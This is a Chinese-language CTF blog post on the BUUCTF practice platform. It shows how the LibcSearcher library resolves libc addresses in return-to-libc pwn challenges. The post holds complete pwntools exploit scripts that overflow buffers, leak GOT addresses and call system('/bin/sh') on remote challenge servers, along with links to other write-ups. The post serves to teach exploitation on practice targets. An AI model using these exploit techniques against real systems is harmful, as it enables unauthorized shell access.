buuctf ctf （第5.5波）学会使用LibcSearcher

这一章是连着上一章的，其实没什么区别，就是介绍了一个LibcSearcher这个库，作用相当简单明了，就是用来代替你需要的libc文件的，就算你的当前目录下没有这个libc文件，只要引入这个库，就可以了。
其本质上与上一波题目没差别，所以可以看成一个类别。

jarvisoj_level3

这道题目在前面也介绍过，这里我们用LibcSearcher来做
可以看到除了将libc=ELF(“libc-2.19.so”)改为了引入LibcSearcher库之外其余操作都一样

from pwn import *
from LibcSearcher import *

#p = process('./level3')
p = remote('node3.buuoj.cn', 26763)
elf = ELF('level3')

read_got = elf.got['read']
write_plt = elf.plt['write']
vul_addr = 0x0804844B


payload = 'a'*0x8C +p32(write_plt) + p32(vul_addr) + p32(1) + p32(read_got) + p32(4)
p.sendlineafter('Input:\n', payload)

read_addr = u32(p.recv(4))
libc = LibcSearcher('read', read_addr)

libc_base = read_addr - libc.dump('read')

system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload = 'a'*0x8C + p32(system_addr) + p32(0) +p32(str_bin_sh)

p.sendlineafter('Input:\n', payload) 

p.interactive()

jarvisoj_level3_x64

与上面的题目基本一样，就是换成了64位，我们来看下其中细微的差别
https://blog.csdn.net/qinying001/article/details/104473597

[HarekazeCTF2019]baby_rop2

同样需要注意这道题的flag不在当前目录下，所以要用下面这个命令
cat ./home/babyrop2/flag
https://blog.csdn.net/qinying001/article/details/104358890?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task

pwn2_sctf_2016

https://blog.csdn.net/weixin_44145820/article/details/104699256

bjdctf_2020_babyrop

https://www.cnblogs.com/gaonuoqi/p/12312777.html

铁人三项(第五赛区)_2018_rop

https://www.cnblogs.com/luoleqi/p/12381227.html

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'
io = remote('node3.buuoj.cn',28574)

elf = ELF('./2018_rop')

write_got = elf.got['write']
write_plt = elf.plt['write']
read_plt = elf.plt['read']

payload = 'a' * (0x88 + 0x4)
payload += p32(write_plt)
payload += p32(0x80484c6)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

io.sendline(payload)
write_addr = io.recv()
print hex(u32(write_addr))
#libcbase = u32(write_addr) - libc.symbols['write']
#system = libcbase + libc.symbols['system']
#binsh = libcbase + libc.search('/bin/sh').next()

obj = LibcSearcher('write',u32(write_addr))
libcbase = u32(write_addr) - obj.dump('write')
system = libcbase + obj.dump('system')
binsh = libcbase + obj.dump("str_bin_sh")

payload = 'a' * (0x88 + 4)
payload += p32(system)
payload += p32(0)
payload += p32(binsh)

sleep(0.5)
io.sendline(payload)

io.interactive()